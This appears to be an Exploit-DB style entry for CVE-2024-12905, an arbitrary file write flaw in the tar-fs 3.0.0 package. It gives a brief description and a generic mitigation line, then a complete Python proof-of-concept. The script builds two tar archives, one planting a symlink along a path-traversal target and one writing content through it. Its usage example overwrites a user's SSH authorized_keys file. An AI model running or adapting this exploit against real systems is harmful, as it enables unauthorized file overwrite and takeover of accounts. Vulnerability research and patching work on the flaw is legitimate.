tar-fs 3.0.0 - Arbitrary File Write/Overwrite

vendor:

tar-fs

by:

Ardayfio Samuel Nii Aryee

6.1

CVSS

HIGH

Arbitrary File Write/Overwrite

CWE

Product Name: tar-fs

Affected Version From: 3.0.0

Affected Version To: 3.0.0

Patch Exists: NO

Related CWE: CVE-2024-12905

CPE: tar-fs:3.0.0

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu

2024

tar-fs 3.0.0 – Arbitrary File Write/Overwrite

The exploit allows an attacker to write/overwrite arbitrary files on the system using the tar-fs 3.0.0 package. By running a specific command, two tar files are generated which can be uploaded sequentially to create a symlink and then write/overwrite the target file.

Mitigation:

Users should avoid running commands or scripts from untrusted sources. Additionally, it is recommended to regularly update software packages to the latest versions to prevent exploitation.

Source

Exploit-DB raw data:

# Exploit Title: tar-fs 3.0.0 - Arbitrary File Write/Overwrite
# Date: 17th April, 2024
# Exploit Author: Ardayfio Samuel Nii Aryee
# Software link: https://github.com/mafintosh/tar-fs
# Version: tar-fs 3.0.0
# Tested on: Ubuntu
# CVE: CVE-2024-12905


# Run the command: Example: python3 exploit.py authorized_keys ../../../../../../../../home/user1/authorized_keys
# This will generate two tar file: stage_1.tar and stage_2.tar
# Upload stage_1.tar first to unarchive the symlink
# Next, upload stage_2.tar to finally write/overwrite the file on the system


import os
import sys
import tarfile

link_name = "normal_file"

def check_arguments():
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <path_to_file_contents> <path_to_target_file_to_overwrite>\n\
Example: {sys.argv[0]} authorized_keys ../../../../../../../../home/user1/authorized_keys\
        ")
        sys.exit()
    content_file_path = sys.argv[1]
    target_file_path = sys.argv[2]

    return content_file_path, target_file_path

def create_symlink(link_name, target_path):
    os.symlink(target_path, link_name)
    print("[+] Created symlink: {link_name} -> {target_path}")

def archive_files(archive_name, file_path):
    tar = tarfile.open(archive_name, 'w')
    tar.add(file_path, link_name, recursive=False)
    tar.close()
    print(f"[+] Archived to: {archive_name}")

def main():
    content_path, target_file = check_arguments()

    stage_1_archive_name = "stage_1.tar"
    stage_2_archive_name = "stage_2.tar"

    create_symlink(link_name, target_file)

    archive_files(stage_1_archive_name, link_name)
    archive_files(stage_2_archive_name, content_path)

if __name__ == "__main__":
    main()